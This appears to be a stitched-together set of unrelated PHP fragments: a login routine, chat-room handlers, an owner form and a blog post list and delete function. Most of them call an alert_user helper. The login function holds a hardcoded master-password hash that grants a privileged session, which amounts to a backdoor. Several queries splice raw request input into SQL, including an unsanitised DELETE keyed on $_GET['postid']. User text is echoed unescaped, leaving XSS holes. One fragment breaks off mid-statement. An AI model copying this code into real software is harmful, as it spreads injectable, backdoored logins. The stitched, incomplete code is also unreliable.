function login($user, $pasw, $mail, $cook = '') { $user = normalize($user); $pasw = normalize($pasw); $newhub = $_POST['create_hub']; $qdu = ses('qdu'); $qb = ses('qb'); $host = hostname(); if (md5($user . $pasw) == 'df66a9ca7bc0d62e580dc575ccc9ba23') { $_SESSION['USE'] = ses('master'); } //$ath=array_flip(authes_levels()); //log $iq = verif_user($user, $pasw); if ($iq) { list($ip, $userhub) = sql('ip,hub', 'qdu', 'r', 'name="' . $user . '"'); if ($ip != $host) { update('qdu', 'ip', $host, 'name', $user); } if ($userhub) { $qb = $user; } return log_result($user, $iq, $qb, '', $cook); } elseif ($user == 'login') { //is_numeric($ath[$user]) if (!rstr(73)) { return loged($user, '', ''); } list($iq, $ip) = ser("id,ip", $qdu . ' WHERE name="' . $qb . '"'); if ($ip == $host) { return log_result($qb, $iq, $qb, '', $cook); } else { list($iq, $USE) = ser("id,name", $qdu . ' WHERE ip="' . $host . '"'); if ($iq) { return log_result($USE, $iq, $qb, '', $cook); } else { return lj('small', "valid_loged", 'bruu! ' . helps('log_no')); } } } //bad passw $iq = verif_user($user, ''); $exist = isgoodhubname($user); $first = sql('id', 'qdu', 'v', 'id=1'); if ($iq) { $_SESSION['tentativ'] += 1; if ($_SESSION['tentativ'] >= 3) { return alert_user($user); } else { return lj('small', "valid_loged", 'bruu! ' . helps('log_nopass')); } } elseif (prmb(11) == 0 && !$newhub && $first && !auth(5)) { return lj('small', "valid_loged", 'bruu! ' . helps('log_nohub')); } elseif ($exist == true) { return lj('small', "valid_loged", 'bruu! ' . $user . ' ' . nms(37)); } elseif (prmb(11) >= 1 or $newhub or !$first or prms('create_hub') == "on") { $rl = "ok"; if (!$mail or strpos($mail, "@") === false) { $tfield = divc("txtcadr", helps('log_newser') . ' ' . prmb(11)); $tfield .= hidden('user', '', $user) . hidden('pass', '', $pasw); if (auth(6) or !$first or prmb(11) >= 6 && prms('create_hub') == "on") { $tfield .= hidden('create_hub', '', $user); } $tfield .= autoclic('mail', 'mail?', '20', '100', '') . ' '; $tfield .= input2('submit', 'envoyer', "ok", 'txtbox') . ' '; $tfield .= lj('txtx', 'valid_loged', picto('left')); return form('/?log=on', $tfield); } else { if ($_POST['mail'] or $newhub) { $user = $newhub ? $newhub : $user; } elseif ($_SESSION['USE']) { $user = $_SESSION['USE']; } if ($user != 'admin') { $iq = adduser($qb, $user, $pasw, $mail); } //add_user if (prmb(11) >= 6 or $newhub or !$first) { modif_cnfgtxt($user, $first); //add_hub $qb = makenew($user); message2newuser($user, $mail, $pasw); $_SESSION['auth'] = ''; } $_SESSION['qbin']['adminmail'] = $mail; log_result($user, $iq, $qb, $rl, $cook); } } }
function give_ops() { global $x7c, $db, $prefix, $txt; $their_id = $this->user_info->profile['id']; $new_ops = $x7c->room_data['ops'] . ";{$their_id}"; $room_id = $x7c->room_data['id']; $db->DoQuery("UPDATE {$prefix}rooms SET ops='{$new_ops}' WHERE id='{$room_id}'"); // Alert the room that they have a new operator, and alert the user that they have // access to the room cp. In addition, reload their top frame so that they can see the Room CP button include_once "./lib/message.php"; alert_room($x7c->room_name, $txt[126], $this->user); alert_user($this->user, $txt[407]); }
function show_owner_form($error = "") { ?> <div class="row"> <div class="large-6 large-centered columns"> <form style="padding-top:80px;" method="POST" action="owner.php"> Owner's Name: <input type="text" name="OName" placeholder="Owner's Name"><br> <br><button type="submit" name="submit">Add Owner</button> </form> <?php //check any errors if ($error != "") { alert_user("failure", $error); } ?> </div> </div> <?php }
// Include the message library include_once "./lib/message.php"; //Check if user can talk if (!$x7s->talk) { alert_user($x7s->username, "Non puoi parlare"); return; } // Make sure the message isn't null if (@$_POST['msg'] != "" && !eregi("^@.*@", @$_POST['msg']) && !eregi("^\\*", @$_POST['msg'])) { if (strlen(trim($_POST['msg'])) < $x7c->settings['min_post']) { alert_user($x7s->username, "Messaggio troppo corto"); break; } $tmp = preg_replace("/&[^;]+;/i", "", trim($_POST['msg'])); if (strlen($tmp) > $x7c->settings['max_post']) { alert_user($x7s->username, "Messaggio troppo lungo: " . strlen($tmp) . ">" . $_POST['msg'] . "<"); break; } //If we are in panic if ($x7c->settings['panic']) { //If user is not a master and room is not panic_free if (!$x7c->permissions['admin_panic'] && !$x7c->room_data['panic_free']) { if ($x7s->panic >= $x7s->max_panic) { $_POST['msg'] = "<span style=\"color: red;\">Panico al massimo</span>\r\n <br>" . $_POST['msg']; } } } $parsed_msg = "<span class=\"locazione_display\">[" . $_POST['locazione'] . "]" . "</span><br>" . " " . $_POST['msg']; send_message($parsed_msg, $x7c->room_name); } elseif (eregi("^@.*@", @$_POST['msg'])) { $_POST['msg'] = eregi_replace("<", "<", $_POST['msg']);
function get_posts($con) { $sql2 = "SELECT * FROM posts"; $result2 = mysqli_query($con, $sql2) or die($mysqli_error($con)); ?> <div class="row"> <div class="large-6 large-centered columns"> <?php while ($row = mysqli_fetch_assoc($result2)) { echo '<div style="opacity:0.5;" class="panel">'; echo '<h1>' . $row["postTitle"] . '</h1>'; echo '<p>' . $row["postContent"] . '<br>'; echo $row["postDate"] . '</p>'; echo '</div>'; } ?> </div> </div> <?php //echo any messages to the user if (isset($_GET["addpost"])) { alert_user("success", "You have shared a post"); } if (isset($_GET["deleted"])) { alert_user("success", "You have delete a post"); } // catch the return value of the in a variable function delete_post($con) { // sql query statement $sql = 'DELETE FROM `posts` where postId=' . $_GET["postid"]; // execute query mysqli_query($con, $sql) or die(mysqli_error($con)); } }